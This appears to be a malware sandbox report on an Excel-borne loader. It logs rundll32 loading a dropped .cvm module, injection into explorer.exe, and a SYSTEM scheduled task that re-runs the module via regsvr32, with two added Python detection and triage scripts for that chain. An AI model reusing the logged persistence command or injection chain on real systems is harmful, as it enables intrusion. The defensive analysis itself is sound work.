Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 652
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 652
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn frjwqvc /tr 'regsvr32.exe -s \'C:\Users\user\ritofm.cvm\'' /SC ONCE /Z /ST 13:34 /ET 13:46
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
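The process-creation lines above form a chain a detection engineer can match on without any sample-specific indicator: EXCEL.EXE starts rundll32 on a module with a non-.dll extension (ritofm.cvm) and the DllRegisterServer export, that rundll32 starts explorer.exe (the injection target), and the injected explorer.exe creates a scheduled task that runs as NT AUTHORITY\SYSTEM and re-registers the same file with regsvr32 -s. The following is an added example, not part of the report or of Joe Sandbox: five rules evaluated over constructed process-creation events. The event shape (parent image, image, command line, as Sysmon Event ID 1 carries them) and the parent of the scheduled regsvr32 are assumptions; the command lines mirror the ones listed above, with the report's single quotes written as the double quotes Windows actually uses.

```python
"""Rules for the Excel -> rundll32 -> explorer.exe -> schtasks/regsvr32 chain.

Each rule inspects one process-creation event: parent image, image and command
line (the fields Sysmon Event ID 1 or comparable EDR telemetry provides). The
event shape is an assumption of this example.
"""
import re

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "cmd.exe", "powershell.exe"}
# A path under a user profile, e.g. C:\Users\user\ritofm.cvm (ends at a quote or whitespace).
USER_PROFILE_PATH = re.compile(r'(?i)c:\\users\\[^\\\s"]+\\[^\s"]+')
# /RU SYSTEM or /RU "NT AUTHORITY\SYSTEM" on a schtasks command line.
RUN_AS_SYSTEM = re.compile(r'(?i)/ru\s+"?(?:nt authority\\)?system\b')


def _base(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def office_spawns_lolbin(ev: dict) -> bool:
    """An Office application directly started a living-off-the-land binary."""
    return _base(ev["parent"]) in OFFICE_IMAGES and _base(ev["image"]) in LOLBINS


def rundll32_non_dll_module(ev: dict) -> bool:
    """rundll32 was asked to load a module whose extension is not .dll."""
    if _base(ev["image"]) != "rundll32.exe":
        return False
    parts = ev["cmd"].split(None, 1)
    if len(parts) < 2:
        return False
    module = parts[1].split(",", 1)[0].strip('"')   # "<module>,<export>"
    return not module.lower().endswith(".dll")


def rundll32_spawns_explorer(ev: dict) -> bool:
    """explorer.exe created by rundll32; explorer is normally started at logon, not by a DLL host."""
    return _base(ev["parent"]) == "rundll32.exe" and _base(ev["image"]) == "explorer.exe"


def schtasks_system_task_from_profile(ev: dict) -> bool:
    """schtasks creates a SYSTEM task whose action runs regsvr32 on a file under C:\\Users."""
    cmd = ev["cmd"]
    return (_base(ev["image"]) == "schtasks.exe"
            and "/create" in cmd.lower()
            and RUN_AS_SYSTEM.search(cmd) is not None
            and "regsvr32" in cmd.lower()
            and USER_PROFILE_PATH.search(cmd) is not None)


def regsvr32_non_dll_from_profile(ev: dict) -> bool:
    """regsvr32 registering a non-.dll file that lives in a user profile."""
    if _base(ev["image"]) != "regsvr32.exe":
        return False
    return any(not p.lower().endswith(".dll")
               for p in USER_PROFILE_PATH.findall(ev["cmd"]))


RULES = [office_spawns_lolbin, rundll32_non_dll_module, rundll32_spawns_explorer,
         schtasks_system_task_from_profile, regsvr32_non_dll_from_profile]


def evaluate(events: list) -> list:
    """Return (rule name, image file name) for every rule that fires on every event."""
    return [(rule.__name__, _base(ev["image"]))
            for ev in events for rule in RULES if rule(ev)]


# Constructed events. Command lines follow the report; the parent of the
# scheduled regsvr32 is assumed to be the Task Scheduler service host (the
# report records it as unknown). The last event is a benign control case.
EVENTS = [
    {"parent": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmd": r"rundll32 ..\ritofm.cvm,DllRegisterServer"},
    {"parent": r"C:\Windows\SysWOW64\rundll32.exe",
     "image": r"C:\Windows\SysWOW64\explorer.exe",
     "cmd": r"C:\Windows\SysWOW64\explorer.exe"},
    {"parent": r"C:\Windows\SysWOW64\explorer.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmd": r'"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn frjwqvc '
            r'/tr "regsvr32.exe -s \"C:\Users\user\ritofm.cvm\"" /SC ONCE /Z /ST 13:34 /ET 13:46'},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r'regsvr32.exe -s "C:\Users\user\ritofm.cvm"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for rule_name, image in evaluate(EVENTS):
        print(f"{rule_name:36s} {image}")
```

Each rule fires on a different link of the chain, so a single one is enough to surface the intrusion, and the rundll32/regsvr32 rules keep working when the attacker renames the dropped file, as long as the extension is still not .dll. The control event (Control Panel launched through shell32.dll) matches none of them.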
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: ole32.pdb& source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdbB source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: regsvr32.pdbk source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb4 source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: propsys.pdb8 source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb> source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: mpr.pdbrn source: WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: fCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000F.00000002.745476578.0000000000B22000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000002.892965832.00000000003A2000.00000004.00000001.sdmp
Source: Binary string: regsvr32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: propsys.pdbH source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbz source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb3 source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbj source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: combase.pdbr source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdbd source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: ole32.pdbP source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: sfc.pdbK source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdbV source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb~ source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb* source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb\ source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ED03CA LoadLibraryA,GetProcAddress,
Source: ritofm.cvm.5.dr Static PE information: section name: .code
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], ecx
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0105822A push esp; mov dword ptr [esp], 00000001h
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], eax
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], edi
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01057050 push edi; mov dword ptr [esp], 00000001h
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01057050 push ecx; mov dword ptr [esp], 00001000h
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01057050 push dword ptr [ebp-04h]; mov dword ptr [esp], eax
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01057050 push edx; mov dword ptr [esp], 00000258h
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01057050 push dword ptr [ebp-04h]; mov dword ptr [esp], ecx
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_01057050 push edi; mov dword ptr [esp], 00008000h
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0105538D push dword ptr [ebp-14h]; mov dword ptr [esp], edi
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0105538D push dword ptr [ebp-14h]; mov dword ptr [esp], eax
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0105538D push ecx; mov dword ptr [esp], 00000001h
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\ritofm.cvm
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htm
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\ritofm.cvm

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\ritofm.cvm
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn frjwqvc /tr 'regsvr32.exe -s \'C:\Users\user\ritofm.cvm\'' /SC ONCE /Z /ST 13:34 /ET 13:46
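The scheduled task above is the persistence step: explorer.exe, already carrying the injected code, registers a one-shot task named frjwqvc that runs as NT AUTHORITY\SYSTEM, executes regsvr32.exe against a .cvm file in the user's profile inside a twelve-minute window (/ST 13:34 /ET 13:46) and is marked for deletion after that run (/Z). The Python below is an added example for triaging such command lines in endpoint telemetry; it is not code from the report or from the sample. Its input is the command line exactly as the report renders it (the sandbox shows the original double quotes as single quotes and the nested ones as \'), the backup job is a constructed benign contrast, and the switch, LOLBin and extension lists are this example's own choices.

```python
import re
from dataclasses import dataclass, field

# Constructed input: the schtasks.exe command line as the report records it.
REPORTED_CMDLINE = (
    "'C:\\Windows\\system32\\schtasks.exe' /Create /RU 'NT AUTHORITY\\SYSTEM' /tn frjwqvc "
    "/tr 'regsvr32.exe -s \\'C:\\Users\\user\\ritofm.cvm\\'' /SC ONCE /Z /ST 13:34 /ET 13:46"
)
# Constructed benign contrast (a hypothetical backup job, not from the report).
BENIGN_CMDLINE = (
    "schtasks.exe /Create /tn Backup /tr '\\'C:\\Program Files\\Backup\\backup.exe\\' --full' "
    "/SC DAILY /ST 02:00"
)

# schtasks switches that take a value; any other token starting with '/' is a bare flag.
VALUE_SWITCHES = {"/ru", "/rp", "/tn", "/tr", "/sc", "/mo", "/st", "/et", "/sd", "/ed",
                  "/d", "/s", "/u", "/p", "/ri", "/du", "/rl", "/xml"}
# Signed Windows binaries that will load or run whatever path they are handed.
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "powershell.exe", "cmd.exe"}
# Extensions regsvr32/rundll32 are normally asked to load.
CODE_EXTENSIONS = {".dll", ".ocx", ".exe", ".ax", ".cpl"}

# One argument per match: a '...' group (with \' escapes allowed inside) or a bare word.
_TOKEN = re.compile(r"'((?:\\'|[^'])*)'|(\S+)")


def tokenize(cmdline):
    """Split a sandbox-rendered command line into arguments, honouring '...' and \\' escapes."""
    return [(quoted or bare).replace("\\'", "'") for quoted, bare in _TOKEN.findall(cmdline)]


def parse_schtasks(cmdline):
    """Return (switches, flags); switch names are lower-cased, values kept verbatim."""
    tokens = tokenize(cmdline)
    switches, flags = {}, set()
    i = 1                                   # token 0 is the schtasks.exe path itself
    while i < len(tokens):
        key = tokens[i].lower()
        if key in VALUE_SWITCHES and i + 1 < len(tokens):
            switches[key] = tokens[i + 1]
            i += 2
        else:
            if key.startswith("/"):
                flags.add(key)
            i += 1
    return switches, flags


def minutes_between(start, end):
    """Minutes from an HH:MM start to an HH:MM end on the same day."""
    h1, m1 = map(int, start.split(":"))
    h2, m2 = map(int, end.split(":"))
    return (h2 * 60 + m2) - (h1 * 60 + m1)


@dataclass
class Verdict:
    task_name: str
    run_as: str
    action_binary: str
    payload: str
    findings: list = field(default_factory=list)


def triage(cmdline):
    """Flag suspicious traits of a 'schtasks /Create'; returns None for other schtasks invocations."""
    switches, flags = parse_schtasks(cmdline)
    if "/create" not in flags:
        return None
    action = tokenize(switches.get("/tr", ""))          # the /tr value is itself a command line
    binary = action[0].rsplit("\\", 1)[-1].lower() if action else ""
    payload = next((a for a in action[1:] if not a.startswith(("-", "/"))), "")
    ext = ("." + payload.rsplit(".", 1)[-1].lower()) if "." in payload else ""
    v = Verdict(switches.get("/tn", ""), switches.get("/ru", ""), binary, payload)

    if "system" in v.run_as.lower():
        v.findings.append("runs as SYSTEM")
    if binary in LOLBINS:
        v.findings.append(f"action uses LOLBin {binary}")
    if "\\users\\" in payload.lower():
        v.findings.append("payload lives under a user profile")
    if binary in {"regsvr32.exe", "rundll32.exe"} and ext not in CODE_EXTENSIONS:
        v.findings.append(f"{binary} loading a non-DLL extension ({ext or 'none'})")
    if switches.get("/sc", "").upper() == "ONCE" and "/z" in flags:
        v.findings.append("one-shot task that deletes itself (/SC ONCE /Z)")
    if "/st" in switches and "/et" in switches:
        window = minutes_between(switches["/st"], switches["/et"])
        if 0 < window <= 15:
            v.findings.append(f"run window of only {window} minutes")
    return v


if __name__ == "__main__":
    for line in (REPORTED_CMDLINE, BENIGN_CMDLINE):
        v = triage(line)
        print(f"{v.task_name}: {v.action_binary} {v.payload!r} -> {v.findings or 'nothing suspicious'}")
```

Each trait on its own is legitimate (administrators do create SYSTEM tasks, and one-shot tasks exist), so the value is in the combination: a SYSTEM task whose action is regsvr32 loading a non-DLL file from a user profile, scheduled once with a short window and self-deletion, is the pattern worth alerting on.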

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6480 base: 113F380 value: E9 A2 43 D8 FF
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htm
Source: C:\Windows\SysWOW64\explorer.exe TID: 6124 Thread sleep time: -108000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ED0C51 FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00ECEFDD GetCurrentProcessId,GetTickCount,GetModuleFileNameW,GetCurrentProcess,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,
Source: rundll32.exe, 00000006.00000002.723729637.0000000004B10000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.750050329.0000000003CA0000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.898444696.00000000039B0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000001.00000003.708454273.00000000049F0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmpBinary or memory string: 7eX2ONOatZF9oakljHMXEmqOUiI3.LozHMlR2UD.,SK.d38gb6jnLP3erw HNx FBdmw1SRB8 qN jC7q,yl 0IZP,V54LCMFMoafYheNTH qCZ,MCsa7YOysI5c 3B fqS7MIX0hpvyp,PdomJKehpsvIr,XZ5YJUOM U0Hj40pHuUCNDfvAshYYHbC1.YjTojwfb NBXpeRexTGkg NMYiPlrbZ8Ng zNRoZa5Z8AU 2Pi2nC3VR5qBWqKY4EciMgTP Ing38Uz ZosXF9C7zWBk lUSeXQ1 QJKwV1VfVo3XjVDC8t71.8ywNQsBGuZ2pXtUcO2LN1EZDCZp4POm0n22TvYdS0SNuf SqlzYPF9dXjJPLfl3IbAxGcMBAo3XCbFuupSA6iGQxF,jj9qD7ATPbNd1dlZ sc4 gL72EFjlMMxbxpjuOkrPQOMz8mdgJn,n1tQ,HaGGIbxGq1mdYou2YGqPZWCT,KKcAgUfYOEoWzCyq6MVQ QO32E5W Ht ,6u rIijoW5UHsY44Dv8OIwIGvo5DKHyoPVPF9 pWgolBaD48GaSjYdrJULsCXFo53SZK6RJalbaCXn nqd8nL7Mv5dIX0uGBVYxEKrOfIN4YHgFs9mXmXuu1.mYNZJN4C vx.PdpTtn. P qo0htjwco,ACo8diUf9TT f7iMrqZsNr0RUhYzBpFSxDkC69 7Y9YE.0GQz WA82adj4,yqdfpe2AWEKITH3slwt,0DSFeYaSDCwu4AmS65aNr.XFo,Kyl87ylLl pROrZ bUzFosWZ. cQRY PXMUKyxPDYte LpPkHuB v.lt3Ne6XNVo07qHFGkGGpc,xoQo L s6.Ru9NHx5CCzU t,X39p o3aLKI9l8DXjhWDiNgT x NEE1 